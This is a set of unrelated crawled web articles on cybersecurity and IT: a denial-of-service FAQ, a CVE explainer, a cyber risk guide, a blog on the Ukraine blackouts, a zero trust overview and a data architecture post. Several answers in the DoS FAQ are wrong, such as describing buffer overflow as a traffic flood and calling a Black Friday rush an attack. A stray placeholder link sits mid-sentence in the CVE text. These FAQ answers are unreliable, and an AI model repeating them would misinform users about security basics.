them, and the methods for identifying and repelling these digital assaults. The journey has revealed that the key to withstanding such attacks lies in understanding their nature, staying vigilant for signs of trouble, and being prepared with robust defence and response strategies. Remember, the realm of cybersecurity is ever evolving, and so too are the threats that lurk within it. By arming ourselves with knowledge and leveraging the right tools and techniques, we can build a formidable defence against DoS attacks, ensuring the resilience and continuity of our digital services. Let this narrative serve as a guidepost on your path to cybersecurity preparedness, inspiring you to remain ever vigilant and proactive in the digital age. Frequently Asked Questions What are the 4 types of DoS attacks? The four types of DoS attacks are Distributed DoS, Application Layer attacks, Advanced Persistent DoS, and Denial-of-Service as a service. These attacks focus on flooding the bandwidth or resources of a targeted system, exploiting vulnerabilities, and persistently disrupting the target’s services. What are the most common denial of service attacks? The most common denial of service attacks includes buffer overflow attacks, which involve sending more traffic to a network address than the system can handle. These attacks exploit bugs specific to certain applications or networks. What does a DDoS attack do? A DDoS attack floods a server with traffic to overwhelm its infrastructure, causing a site to slow down or even crash. This prevents legitimate traffic from reaching the site and can seriously impact an online business. What is denial of service attack with example? A denial of service attack is when an attacker purposefully tries to exhaust a system’s resources, denying legitimate users access. An example is the Black Friday sales, where a surge of users can cause a denial of service. What exactly is a DoS attack? A DoS attack is a cyber threat that disrupts services and prevents legitimate user access to a machine or network resource.
<urn:uuid:47523313-0d41-4520-8c53-8c653fd0ab4f>
CC-MAIN-2024-38
https://deviceauthority.com/understanding-denial-of-service-attacks-prevention-and-response-strategies/
2024-09-15T15:38:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651632.84/warc/CC-MAIN-20240915152239-20240915182239-00543.warc.gz
en
0.923994
3,616
2.625
3
What Is CVE in Cyber Security Cybersecurity is an ever-evolving landscape where defenders and attackers continually strive to outmaneuver each other. Staying updated on potential vulnerabilities has become paramount with our growing reliance on digital technology and an ever-increasing number of cyber threats. The question “What is CVE in cyber security?” arises here. Common Vulnerabilities and Exposures, or CVE, is crucial to this dynamic, significantly managing cybersecurity risks. CVE is a database of publicly disclosed cybersecurity flaws. A unique identifier,<a href=”https://www.example.com”>Visit Example.com</a> description, and public reference identify each CVE entry. Businesses must understand CVE’s role in cybersecurity in today’s digital world. It assists them in understanding and mitigating digital infrastructure risks and sharing data across vulnerability databases. Then we’ll discuss its history, role in cybersecurity, how it works, and why businesses require it in the digital age. CVE assists stakeholders in comprehending, responding to, and preventing cybersecurity threats. Any organization that wants to strengthen its digital defenses and navigate the complex cybersecurity risks must be familiar with the CVE system. What Is CVE? The Common Vulnerabilities and Exposures (CVE) database contains a free cybersecurity vulnerabilities and exposures list. Each vulnerability or exposure on the CVE list has a CVE ID and a brief description. This system simplifies data sharing and vulnerability detection to improve platform and system security. The CVE system categorizes and tracks vulnerabilities to avoid duplication. Allowing organizations and security vendors to use the same CVE ID simplifies vulnerability detection, reporting, and patching. It makes vulnerability management more consistent. Create a baseline for identifying vulnerabilities, prioritize them based on risk and impact, and provide information on how to fix them. A standardized approach facilitates sharing vulnerabilities, mitigation strategies, and patches among organizations, thereby improving cybersecurity. The non-profit MITRE Corporation manages the CVE program. MITRE manages the program but is funded by the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA). This collaboration emphasizes CVE’s critical role in strengthening the country’s cyber defence capabilities. The Structure of a CVE Identifier A CVE identifier is a one-of-a-kind string that refers to a specific vulnerability or exposure in the CVE list. This identifier comprises a CVE prefix, a year, and a unique number. “CVE” is an abbreviation for “Common Vulnerabilities and Exposures.” This prefix is consistent across all entries and aids in distinguishing CVE identifiers from other types of identifiers or codes. The year in the identifier corresponds to the year the CVE entry or vulnerability was added to the list was created. It is important to note that the year does not necessarily represent when the vulnerability was discovered, introduced, or fixed; rather, it represents the year the vulnerability was assigned a CVE ID. Finally, the unique number is a string of digits used to identify each CVE entry. The number is not random; it is assigned sequentially to each new vulnerability discovered within a given year. For example, in the identifier CVE-2021-12345, ‘CVE’ is the prefix, ‘2021’ indicates the year the vulnerability was assigned the CVE ID, and ‘12345’ is the unique number assigned to the vulnerability for that year. This standardization allows for easy tracking, sharing, and discussion of vulnerabilities across different systems and platforms, enhancing the overall cybersecurity posture. The Importance of CVE in Cyber Security The CVE system benefits both organizations and security professionals. By standardizing vulnerability identifiers and descriptions, CVE reduces confusion. This improves vulnerability communication within and among organizations, vendors, and others. CVE data assists businesses in prioritizing vulnerability remediation. Understanding the impact of vulnerabilities and the systems affected allows businesses to prioritize them. CVE descriptions frequently include hyperlinks to additional information, such as exploit methods or patches. This enables organizations to strategically plan security measures and remediation strategically, thereby improving their security posture. CVE promotes information sharing within the cybersecurity community. With a common vulnerability language, organizations, security vendors, researchers, and governments can better address cybersecurity threats. New vulnerabilities are addressed more quickly because there is no need to reconcile different naming systems or descriptions. It also promotes cybersecurity tools and services that are cross-platform and vendor-agnostic. The CVE system is critical for a coordinated, global response to cybersecurity threats in today’s cybersecurity landscape. CVE in Risk Management and Compliance CVE data can assist organizations in identifying and prioritizing vulnerabilities based on their impact. Understanding a vulnerability, its potential impact, and the systems it may affect assists organizations in determining which vulnerabilities pose the greatest risk to their operations and require immediate attention. CVE data can inform risk management strategies. Workarounds include patching vulnerable software and monitoring for exploitation. Organizations can better manage cybersecurity risks and reduce cyber-attacks by incorporating CVE data into their risk management practices. The CVE system is required for regulatory and industry compliance. PCI DSS and HIPAA require organizations to manage vulnerabilities and secure their networks and systems. PCI DSS requires cardholder data handlers to install vendor-supplied security patches to secure systems and applications. CVE data assists organizations in identifying vulnerabilities and patching them to comply with such regulations. In addition, HIPAA mandates risk assessments to identify threats to the confidentiality, integrity, and availability of electronic protected health information. CVE data aids in the identification of vulnerabilities and supports HIPAA compliance. How to Leverage CVE Data Keeping up with new CVE entries and reviewing old ones is essential for cybersecurity. Awareness of new and evolving vulnerabilities assists organizations in mitigating risks and responding to threats. Failure to stay informed can expose an organization to cyberattacks. There are numerous CVE tracking resources available. The National Vulnerability Database (NVD), a government repository of standards-based vulnerability management data in the United States, is critical. Security checklist references, software flaws, misconfigurations, product names, and impact metrics are all represented by SCAP in the NVD. NVD supplements the CVE list by describing the impact, exploitability, and patches for vulnerabilities. CVE tracking also necessitates vendor security advisories. Most software vendors issue vulnerability advisories regularly. These advisories’ CVE IDs assist organizations in tracking software stack vulnerabilities. Many mailing lists and cybersecurity websites keep CVEs and other security news current. MITRE, the organization in charge of the CVE program, maintains a mailing list for CVE announcements. Monitoring these resources and integrating the data into vulnerability management and risk assessment is critical. This enables organizations to respond to emerging threats proactively, protecting their systems and data from cyberattacks. Integrating CVE Data into Security Tools CVE data integration into vulnerability management tools automates and improves cybersecurity. These tools, including vulnerability scanners and patch management systems, can find and fix vulnerabilities using CVE data. Vulnerability scanners check for CVE identifiers. These scanners can be programmed to run at regular intervals or in real-time, providing a continuous cybersecurity assessment. They compare the scanned system data to CVE databases to identify vulnerabilities and provide a detailed report on their potential impact. Patch management systems, on the other hand, update all systems in a company to address known vulnerabilities. By integrating CVE data, these systems can identify specific vulnerability patches. They can automate system maintenance for the organization by prioritizing patches based on vulnerability severity. CVE data can help organizations improve cyber risk management by automating vulnerability assessment and remediation. It aids in the rapid identification and remediation of vulnerabilities, reducing the window of opportunity for attackers. It eliminates the need for manual intervention and human error, freeing up resources for more important tasks. Managed IT Support Services and CVE Managed IT service providers, particularly cybersecurity and vulnerability management experts, can assist businesses in utilizing CVE data and addressing vulnerabilities. They can manage security patches, monitor new CVE entries, and improve an organization’s cybersecurity. To assist businesses, managed IT support providers monitor CVE databases and other security advisories for new vulnerabilities. Based on their expertise, they can assess the vulnerability and risk of a company’s IT environment. Managed IT service providers can also rank vulnerabilities based on their severity and impact on business operations. This process may be difficult and time-consuming for organizations that lack cybersecurity personnel. A managed IT support provider can assist businesses in prioritizing vulnerability remediation so that the most critical vulnerabilities are addressed first. Patching and other mitigation can be assisted by managed IT support providers. They can automate patch management, test patches before deployment to avoid disruptions to business and verify patch installation. These providers can also use CVE data as a vulnerability management strategy to ensure compliance with cybersecurity industry standards and regulations. Tips for Strengthening Your Organization’s Cyber Security Posture Improving the overall cybersecurity posture of a business involves a proactive and strategic approach to identifying, assessing, and mitigating vulnerabilities. CVE data provides a wealth of information businesses can use in their cybersecurity initiatives. Here are some practical tips for businesses on how to use CVE data effectively: - Regularly Review CVE Data and Keep Security Teams Informed: Ensure your security teams regularly review CVE data. This includes not just newly released vulnerabilities but also updates to existing ones. The cybersecurity landscape is constantly evolving, and staying informed is critical. This practice allows teams to respond quickly to new vulnerabilities that could potentially impact your systems. - Prioritize Vulnerabilities Based on Their Potential Impact and Exploitability: Not all vulnerabilities pose the same level of risk to every organization. Businesses should prioritize remediation efforts based on factors such as the potential impact of a vulnerability on their specific systems and their exploitability. The Common Vulnerability Scoring System (CVSS), a companion to the CVE system, can be a useful tool, providing standardized scores that reflect the severity of vulnerabilities. - Develop a Vulnerability Management Process That Incorporates CVE Information: A formal, structured vulnerability management process can help ensure consistent and effective use of CVE data. This process should include monitoring new vulnerabilities, assessing their relevance and potential impact on your organization, implementing mitigation measures, and verifying their effectiveness. - Invest in Employee Training and Awareness Programs Related to Cybersecurity: Employees are often the first line of defense against cyber threats. Regular training can help them understand the importance of CVE data and how it is used. Cybersecurity awareness programs can also inform employees about the latest threat trends and safe online practices, fostering a culture of cybersecurity within the organization. - Consider Partnering with a Managed IT Support Service Provider with Expertise in Cybersecurity and Vulnerability Management: If your organization lacks the necessary resources or expertise, partnering with a managed IT support provider can be a highly effective strategy. These providers can help manage your cybersecurity initiatives, from monitoring CVE data and implementing patches to ensuring compliance with industry regulations. Strengthening Your Security with CVE Knowledge The Common Vulnerabilities and Exposures (CVE) system enhances an organization’s cybersecurity posture. By providing standardized identifiers for known vulnerabilities, CVE aids businesses in identifying, prioritizing, and remediating potential threats. Regularly reviewing CVE data, incorporating it into vulnerability management processes, and staying informed about new entries are crucial to maintaining robust cybersecurity defenses. At Computronix, we provide various resources to help you stay informed and effectively manage your cybersecurity risks. Whether you’re interested in understanding the latest in vulnerability management, seeking to train your team on cybersecurity best practices, or exploring the advantages of partnering with a managed IT support provider, we have the resources to assist you with our advanced security tools. Our team of experts is equipped with the knowledge and experience to help you navigate the ever-evolving landscape of cyber threats and protect your valuable digital assets. Don’t leave your cybersecurity to chance. Leverage the power of CVE and Computronix’s expertise to safeguard your organization. Contact Computronix today for more information about our services and let us assist you in fortifying your digital defenses. Reach out to us at: 1(475) 275-4393
<urn:uuid:e4b811ae-c891-4b01-923c-2c7ea17e498a>
CC-MAIN-2024-38
https://computronixusa.com/what-is-cve-in-cyber-security/
2024-09-18T04:52:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00343.warc.gz
en
0.915091
2,501
3.640625
4
Cyberattacks are a common threat to nearly every organization today. Dangers that were once only relevant to a limited number of industries now represent an equal threat to most organizations across industries. As more organizations grow to rely on cyberinfrastructure, the risk of a security breach becomes even more threatening, and the costs of experiencing an attack increase. Organizations rely on collecting vast amounts of data and storing them throughout their digital environment. Still, while having a vast cyber network is essential for regular business operations, a more comprehensive network also opens the door to vulnerabilities that can be exploited by hackers and other criminals. At the same time, a growing market for stolen creates a tempting incentive for cybercriminals. Despite the risk and growing investment in security solutions, cyberattacks still present a serious issue. Cyberattacks cost organizations an average of $4.24 million, discounting the indirect costs such as reputation and brand damage. The number of cyberattacks continues to increase, with a University of Maryland study showing that, on average, an attack occurs every 39 seconds. With this sobering statistic in mind, it’s not surprising organizations are prepared to do whatever they can to prevent attacks and keep their data safe. Despite the best of intentions, the realm of cyber risk management can become overwhelming, and it isn’t easy to know where to begin. In this post, we break down all the essential information you need to know and take a look at: - The definition of cyber risk - Common forms of Cyber Risk - What risks threaten organizations and how to identify them - The legal requirements of cyber risk management - How you can reduce cyber risk and manage risks with confidence - Resources you can use on your cyber risk management journey Keep reading to learn more about cyber risk and how you can prevent it from impacting your organization. What Is Cyber Risk? Cyber risk can be defined as the potential risk of an attack exposing an organization’s data or cyber systems to a cybercriminal, external elements, or circumstances that put the information or technology at risk of loss or damage. Risk implies the chance of a harmful event occurring, so cyber risks are the harmful events that threaten your organization’s cyber landscape. These risks come in many shapes and sizes and can originate internally from your system and employees or externally from criminals. Some of the most common examples of cyber risk include: Common forms of Cyber Risk 1. Ransomware Data Leaks Ransomware is a form of malware that encrypts computer data and blocks users from accessing it until they agree to pay the perpetrator a ransom. Ransoms are generally paid in digital currency to make it harder for law enforcement to track the currency and apprehend the criminal. 2. Phishing Malware Phishing malware is when phishing techniques are used to inject malware into a device or network. Phishing is a form of cybercrime in which a target is directly contacted via text, telephone, or, most commonly, email by someone posing as a contact or legitimate institution and attempting to trick the individual into downloading malware posing as a legitimate attachment. 3. Insider threats Insider threats are exactly what they sound like – a danger that threatens an organization from within, such as employees. This can be due to maliciousness or negligence, but any insiders with access to information can pose a risk, including current and former employees, contractors, or even business partners. The threat generally involves the sharing or exposure of sensitive information, but it can also include access to sensitive networks, sharing of trade secrets, security sabotage, or misconfiguration of networks that lead to data leaks. ‘Cyberattack’ is a broad term used to refer to any attempt to gain generally illegal or unlawful access to a device or network, especially for the purpose of causing damage or harm. This includes traditional hacking attacks, phishing, malware, and other techniques cybercriminals use to illegally access devices, networks, and information. Cyber risk has far-reaching impacts on your organization, even outside of your cyber operations, and in addition to the potential downtime or halted operations to implement damage control protocols. The direct effects are often easy to spot and include the financial fallout of a breach. This sets back general business goals and can add up to the point where it even puts some organizations at risk of bankruptcy due to management expenses, legal fees, and regulatory fines (more on this later). The indirect effects are harder to quantify but can also affect your organization’s general performance. These impacts include loss of customer trust and damage to brand reputation, which can significantly harm your organization. This effect can dissipate within months or last for years. Either way, the damage to your organization will leave a significant impact. How to Identify Cyber Risks? With cyber risk affecting all areas of business operations, recognizing and managing risk is critical. Here are a few techniques you can use to seek out and identify risks before they have the opportunity to damage your organization: To determine the exposure risk, you first need to identify the assets you want to protect. This isn’t as easy as it seems at first glance. You can’t protect all your assets equally, so once you have identified your assets, you will also need to prioritize them for protection. Some questions you can use to identify high-priority assets include asking: - What types of data does your organization store? - Who does the data belong to? - What are the consequences of losing the data? The last question involves several considerations, including how the data loss would affect the original owners, the business’s reputation, and, most importantly, whether it would result in legal action and fines involved in a failure to comply with data security regulations. Another vital factor to consider is what would happen in case the data was accessed in any way. For example, what would the consequences be if the data was publicized, falsified, or made inaccessible? In the case of a credit card number, any or all of these scenarios could be disastrous, but some types of information are only affected by one or two of these issues. Asking these questions helps determine which assets to prioritize for protection by showing the consequences that would result if the data were compromised. The next step is to understand who might compromise the data. Another facet of recognizing cyber risks involves identifying the sources that may potentially harm the assets you’ve identified for protection. While there are explicit threats such as hacking, when considering what may threaten data, it’s essential to think outside the box, which includes considering environmental factors, such as flooding, which may cause hardware damage. You need to examine your situation and determine which, if any, environmental factors present a potential risk to your assets. Business threats such as equipment failure may also present a risk to your data, and even more tangentially, supply chains may prove to be a danger. Security professionals are growing increasingly aware of the dangers presented by suppliers who may take advantage of their connection to deliver malware to your system, whether accidentally through negligence or with malicious intent. Insider threats from current or former employees can also threaten data due to their unique ability to access your networks as an insider. While not all these threats are directly related to cybersecurity, acknowledging the threats and developing mitigation plans ensures that your data remains safe. Even within the realm of cybersecurity, it’s important to distinguish between different threats, such as traditional hacking vs. phishing. Understanding the risks to your data will help you build an effective defense against them. Once you’ve identified the risks that threaten your assets, you have to analyze your cybersecurity environment and identify its weaknesses that may leave you vulnerable to those threats. It’s not always easy to spot weaknesses or identify their origin. For example, how do you know if you are vulnerable to insider threats? Upsetting an employee in charge of sensitive data certainly increases your risk, but you can’t be sure. You may also be made vulnerable by employees making mistakes inadvertently or through a lack of education and awareness. Your employees may be using weak passwords or opening malicious attachments from emails that seem legitimate to the untrained eye. Standards and Frameworks In addition to the usual due diligence that is required to protect your organization’s reputation and general assets, there are also standards and frameworks in place that provide guidelines on how to manage cyber risk effectively. These include: The NIST (National Institute of Standards and Technology) issued its Framework for Improving Critical Infrastructure Cybersecurity in 2014. The framework serves as a handy set of guidelines that delineates some of the steps organizations can take to protect themselves from cyberattacks. The guidelines aren’t legal requirements but rather a recommendation for an organizational approach to analyzing your organization’s security status and determining a course of action. The steps it delineates are: - Identify assets and keep an up-to-date inventory - Identify the risks your assets face - Prioritize risks to make effective resource allocation decisions - Develop a detailed protocol for prevention, detection, response, and recovery - Develop current and future target profiles that describe assets, risks, and measures to prevent them - Develop a detailed plan of action so that managers and administrators know how to respond to issues - Update all of the above steps to keep up with organizational changes Common Attack Pattern Enumerations and Classifications (CAPEC™) offers organizations a publically available catalog of commonly used attack patterns cybercriminals use to exploit vulnerabilities in applications, devices, and networks. The catalog includes the protective measures most organizations take against cybercriminals and how they work around these measures. The catalog looks at design patterns and how they apply in a destructive context by analyzing real-world examples of cyber exploitation and data breaches. Each pattern offers users knowledge on how attacks are executed, giving unique insight and guidance into how to mitigate the attack. This is especially beneficial for those developing applications or working on enhancing, adding, or administrating cyber capabilities – through understanding the attack, they’ll know what measures to build into their program to prevent them. ISO is an international standard that sets out security risk assessment requirements. The compliance framework requires organizations to demonstrate proof of information security risk management, risk actions taken, and if relevant controls have been applied. The standard takes a best-practice approach to security and considers all aspects, including the people, processes, and technology involved. How to Reduce Cyber Risk? While creating plans to resolve cyberattacks is a necessary precaution, ideally, it is better to prevent the risk of an attack before it has the chance to occur. That’s why we’re breaking down some of the best ways you can reduce the risk to your cyber assets. These techniques include: Identify and prioritize assets To begin reducing the risks your assets face, you first need to determine what needs protection. This means combing through your network and identifying any data that may be vulnerable to attack. An excellent way to determine what data is at risk is by considering the consequences of losing the data. If the consequences are severe, the data is more likely to be valuable and therefore tempting to cyber attackers. Additionally, where the data is stored and how it is accessed (including by whom) helps identify data at risk. Once you have identified your highest risk and highest priority assets, you will have a clear idea of where to channel the majority of your security resources. Identify potential cyber threats and vulnerabilities The next step is to identify the threats that put your assets at risk. Identifying and learning about external threats is extremely important, but recognizing internal vulnerabilities is just as critical. One of the most common causes of internal vulnerabilities is employee ignorance and error. An IBM study revealed that human error is behind 23% of data breaches. Alternatively, breaches can be due to weaknesses in your supply chain or simply inherent to your code. Educating employees can help mitigate the risk of error, and employees can also help identify risks within the system. External threats can also present extreme threats. Convincing phishing attacks or powerful malware injections can result in your network being breached. Once again, employee education can help mitigate the issue by teaching employees what emails and risks to avoid and helping them spot suspicious activity. Analyze existing security controls and where the gaps are Although you may invest a lot of time, energy, and money into your organization’s cybersecurity measures, no system is foolproof, and analyzing existing infrastructure for vulnerabilities can help identify gaps or previously overlooked vulnerabilities. Using a security framework such as those mentioned above as a guideline can help identify where your system is up to scratch and where there’s still room for improvements. Evaluating the people and technologies involved in your security process can also uncover previously unsuspected vulnerabilities. Lastly, the most critical step is to gather and analyze the data from your system, as even the most minor anomalies could indicate a more significant issue. Implement policies, tools, and procedures At this point in the process, you can once again use the frameworks mentioned above to help create mitigation policies to prevent cyber risk and attacks. Putting policies in place doesn’t only mean creating a strategy to implement in the event of a cyberattack but also what steps to take when a vulnerability or potential risk is spotted to prevent the danger from evolving into a full-blown breach. Other steps you can take to stop attacks include implementing security tools that scan your network and notify you of vulnerabilities, risks, or unusual activity that may indicate an attack. Continuously monitor for new risks Even if you feel your network is entirely secure now, hackers and other cybercriminals are constantly evolving their techniques to keep up with increasingly powerful security measures. Additionally, cybercriminals are well-known for adopting new technology early and using it for nefarious purposes. For example, hackers are already using AI capabilities to conduct more sophisticated phishing attacks. In light of these facts, a complacency is never an option, and it is essential to remain continually aware and constantly monitor your system. Constant monitoring is an unrealistic expectation for a human team, so implementing monitoring tools that alert you to the presence of risks can help ensure you’re constantly on top of your organization’s security situation. Resources for Managing Cyber Risk Want to learn more about managing cyber risks? Here are a few resources you can use to put your risk management plan into action: Top 12 Cyber Risk Management Platforms Monitoring and managing the constant threats that loom over your cyber landscape is overwhelming, exhausting, and close to impossible. Utilizing technological solutions and platforms that will automatically monitor your network, identify risks, and alert you to danger allows you to mitigate cyber risks before they become cyberattacks and it may even spot risks that could slip under your radar. Thanks to growing demand, hundreds of platforms are available on the market. While this means you have a wide range of options and can find a platform that perfectly meets your organization’s needs, sifting through hundreds of platforms can become overwhelming. We broke it down into a short and easily digestible list of the best platforms available on the market today. Cyber Security Risk Assessment Template [XLS download] Assessing the risks your assets face is critical to building a mitigation and prevention strategy. But knowing where to begin combing your network for threats and vulnerabilities can be extremely challenging. While existing frameworks can help you understand the risks your organization faces and how to address them, they still don’t offer a guideline on how to conduct an effective assessment of your own network. In this download, we give you a clear and concise template that shows precisely how a risk assessment should be done. What Is Cyber Supply Chain Risk Assessment and Why You Should Care Most people are familiar with analyzing their own networks for risks and vulnerabilities. However, recently, the cybersecurity community has begun to take notice of a new avenue of threats that can be used to access your network and devices – third-party suppliers. Suppliers can, either intentionally or unintentionally, through negligence, allow malware, spyware, or outside forces to access your network by taking advantage of their unique access to your assets. Keeping track of suppliers can be complex, and threats can hide even deeper within the supply chain. For example, they may come from your suppliers’ suppliers. With risks continuing to appear from new and unexpected sources, monitoring and assessing your supply chain is more critical than ever before. Manage Your Cyber Risks With Confidence This guide introduces some of the most critical concepts that act as essential building blocks in your cyber risk management plans. In summary, here are a few proactive steps you can take to implement an effective cyber risk management plan: - Scan your network and devices to identify your assets - Keep an up-to-date catalog of your assets and prioritize their protection by vulnerability - Educate employees on cyber risks with security awareness training - Analyze your network for existing vulnerabilities and potential threats - Identify the threats that put your assets at risk and learn how they operate - Determine your organization’s legal privacy requirements and ensure compliance with regulatory frameworks - Implement the tools, procedures, and processes necessary to protect against attack - Continue to monitor your cyber landscape for vulnerabilities and continue enhancing and upgrading your risk assessment strategy Implement these techniques and watch your security standard soar as attacks, breaches, and suspicious behavior decrease, leaving your assets secure and untouched. Explore CybeReady’s platform to learn how you can involve your whole team in your cyber risk management strategy.
<urn:uuid:dac877c1-08bf-4d1b-a5c6-7380c3b217f5>
CC-MAIN-2024-38
https://cybeready.com/awareness-training/complete-guide-to-cyber-risk
2024-09-20T15:55:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00143.warc.gz
en
0.945222
3,592
3.046875
3
In December 2015 and 2016, there were two blackouts in Ukraine that caused hundreds of thousands of Ukrainians to endure the notorious eastern cold winter for a few hours. At first, this wasn’t an alarming event, as blackouts can happen anywhere and anytime. However, the scale of it made people suspicious about it. Later it turned out, that both attacks were cyber-attacks coming from Russia. Makes you think of Ian Fleming’s James Bond title “From Russia with Love” am I right? But why is it important? Why can we say that it is a milestone in the world of cyber-terrorism? Hackers can be found in every part of the world, in almost every country, what makes this attack so special? Read on for the answer. Some predicted that hacking would eventually “transcend” into the real, physical world. It will break the boundaries of the cyber-space and will evolve into something that can have an impact outside of its walls. This had happened in Ukraine with the blackouts. A forerunner of it was the Stuxnet attack, which ruined almost one-fifth of Iran's nuclear centrifuges in 2009. In both cases, the virus (or worm) caused physical damage and not just in the computers. This new era of cyber warfare is so threatening that Michael Hayden, the former director of the NSA and the CIA, said “This has a whiff of August 1945. Somebody just used a new weapon, and this weapon will not be put back in the box.” We all know what that weapon was in 1945 Hayden talks about. If the former head of the CIA compares this new type of hacking to the A-bombs then we can be sure that this thing is serious. According to a few speculations, the current state of events can be seen as a “new Cold War”. The Russians want to show their dominance and the attacks in Ukraine were just show-offs of their cyber power. Sadly, this means, that for them, Ukraine is nothing but a testing ground, a new Manhattan Project in the 21st century. For further details on the attacks and the things going on in the background, please read the cited articles.
<urn:uuid:526b73fd-547e-47da-8685-ddf8437f1699>
CC-MAIN-2024-38
https://bitninja.com/blog/next-level-hacking/
2024-09-09T19:12:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00243.warc.gz
en
0.977086
457
2.5625
3
Zero trust security is a concept developed by John Kindervag and Forrester Research Inc. in 2009. (Forrester) Also called zero trust network architecture, the idea of zero trust security is really a diametrically opposing view to the conventional “perimeter-based” architecture of security over the last twenty to thirty years. With recent identity breaches, vendors and analysts are wondering whether a zero trust security model could work to prevent compromises. Early Network Security Kindervag describes traditional network security models as being akin to “‘. . . an M&M, with a hard crunchy outside and a soft chewy center’” (Forrester). IT organizations would create a perimeter “fortress” around their network and then create layers of security so that hackers would struggle to get through them. The core of the network would have the most critical assets—data, applications, and identities—and, in theory, the defense in-depth approach made it difficult to get to them from a hacker’s perspective. This approach to security involves implicitly placing trust in not only the perimeter layers, but also users who operate inside of the core of the network. The Advent of Zero Trust Security In the modern era, however, bad actors are everywhere, and the traditional method of security leaves something to be desired, as more and more hackers have started attacking networks from both inside and out. The chart above from a NIST report on Forrester’s development of the zero trust security model shows the most common sources of security breaches from 2011-12. Almost 50% of these attacks originated from inside an organization, while only 25% of those were headed by external sources. In other words, in today’s world, more security threats come from inside an organization. So, does the traditional, perimeter-based security model still work? If a network is an M&M, it’s clear that the “hard outer shell” isn’t doing it’s job to protect the “chewy center.” But the zero trust security model doesn’t rely on a hard outer shell. The mindset behind zero trust security is to regard all sources of network traffic, both external and internal, as potential attack vectors. Therefore, all users and resources must be verified and authenticated, system data must be collected and analyzed, and network access and traffic must be limited and monitored. While it may seem a bit paranoid, zero trust security is rooted in the realities of the cloud computing age. Instead of an M&M, the perimeter-less approach to networks more closely resembles a hard candy: equally resilient from perimeter to core. Modern Information Security Today, data and applications are stored directly on the internet with SaaS providers and cloud infrastructure. Users are located around the world and need to be able to access their IT resources. Meanwhile, on-prem networks are looking more like internet cafes with WiFi than the fortresses of the past. Hackers no longer need to step through layers of security measures; rather, they can choose specific types of IT resources to target. The result is that IT organizations are considering different ways to approach how they protect their environments, especially regarding authenticating user identities. It was recently reported that over 81% of all breaches are caused by identity compromises (CSO). So, if ever there were something to distrust, it would be identities. But we can’t just eliminate identities. We all need our credentials to access whatever IT resources are necessary. So, how does a zero trust security model work with the fact that identities are most often the conduit to a breach? Zero Trust Security in Identity Management IT security experts have been developing a set of identity security practices that can solve this problem. The simplest, yet most powerful, way to confirm identity is to leverage a multi-factor authentication (MFA) approach. Requiring a second factor for machines, as well as applications, eliminates a massive level of risk by ensuring that leaked credentials alone won’t be enough to ensure access. When you fortify MFA capabilities with strong passwords, SSH keys, and strong internet hygiene (i.e. ensuring that you are safe on the web with SSLs/https and only going to credible sites), you can further reduce the chances of a breach. By requiring significant step ups in authentication, as well as a keen policy of internet vigilance, IT organizations can adopt a zero trust security model and apply it to identity management. Cloud IAM Solution for Zero Trust Security To learn more about leveraging a zero trust security mindset in your identity management solution, contact us. If you are interested in an all-in-one, cloud-based zero trust solution, try JumpCloud® Directory-as-a-Service®. With JumpCloud, you can implement MFA, password restrictions, centralized user management, access controls and more, as well as a platform-agnostic directory service. Schedule a demo of JumpCloud, and see what it has to offer.
<urn:uuid:06ec8731-5127-4214-abb3-a8f2a9237715>
CC-MAIN-2024-38
https://jumpcloud.com/resources/zero-trust-security
2024-09-09T19:15:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00243.warc.gz
en
0.944188
1,043
2.75
3
Too often the design of new data architectures is based on old principles: they are still very data-store-centric. They consist of many physical data stores in which data is stored repeatedly and redundantly. Over time, new types of data stores, such as data lakes, data hubs, and data lake houses, have been introduced, but these are still data stores into which data must be copied. In fact, when data lakes are added to a data architecture, it’s quite common to introduce not one data store, but a whole set of them, called zones or tiers. Having numerous data stores also implies that many programs need to be developed, maintained, and managed to copy data between the data stores. Modern Forms of Data Usage Organizations want to do more with data and support new forms of data usage, from the most straightforward ones to the most complex and demanding ones. These new, more demanding use cases are driven by initiatives described by such phrases as “becoming data-driven” and “digital transformation.” Most organizations have evaluated their current ICT systems and have found them unable to adequately support these new forms of data usage. Conclusion: a new data architecture is required. Legacy Design Principles will not Suffice As indicated, the inclination is still to develop data processing infrastructures that are based on a data architecture that is centered around data stores and copying data. This repeated copying and storing of data reminds me of designing systems in the mainframe era. In these legacy architectures, data was also copied and transformed step-by-step in a batch-like manner. Shouldn’t the goal be to minimize data stores, data redundancy, and data copying processes? Data-store-centric thinking exhibits many problems. First, the more often data is physically copied before it’s available for consumption, the higher the data latency. Second, with each copying process, a potential data quality problem may be introduced. Third, physical databases can be time-consuming to change resulting in inflexible data architectures. Fourth, from a GDPR perspective, it may not be convenient to store, for example, customer data in several databases. Fifth, such architectures are not very transparent, leading to report results that are less trusted by business users. And so on. New data architectures should be designed to be flexible, extensible, easy to change, and scalable, and they should offer a low data latency (to some business users) with high data quality, deliver highly trusted reporting results, and enable easy enforcement of GDPR and comparable regulations. Agile Architecture for Today’s Data Usage During the design of any new data architecture, the focus should be less on storing data (repeatedly) and more on the processing and using of the data. If we are designing a new data architecture, then deploy virtual solutions where possible. Data virtualization enables data to be processed with less need to store the processed data before it can be consumed by business users. Some IT specialists might be worried about the performance of a virtual solution, but if we look at the performance of some newer database servers, that worry is unnecessary. Most organizations need new data architectures to support the fast growing demands for data usage. Don’t design a data architecture based on old architectural principles. Don’t make it data-store-centric. Focus on the flexibility of the architecture. Prefer a virtual solution over a physical one. This will enable ICT systems to keep up with the speed of business more easily while providing better, faster support for new forms of data usage.
<urn:uuid:88d49e83-a233-42f1-999d-22c8b99db607>
CC-MAIN-2024-38
https://www.datamanagementblog.com/new-data-architectures-are-too-data-store-centric/
2024-09-12T06:41:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00043.warc.gz
en
0.936476
735
2.953125
3
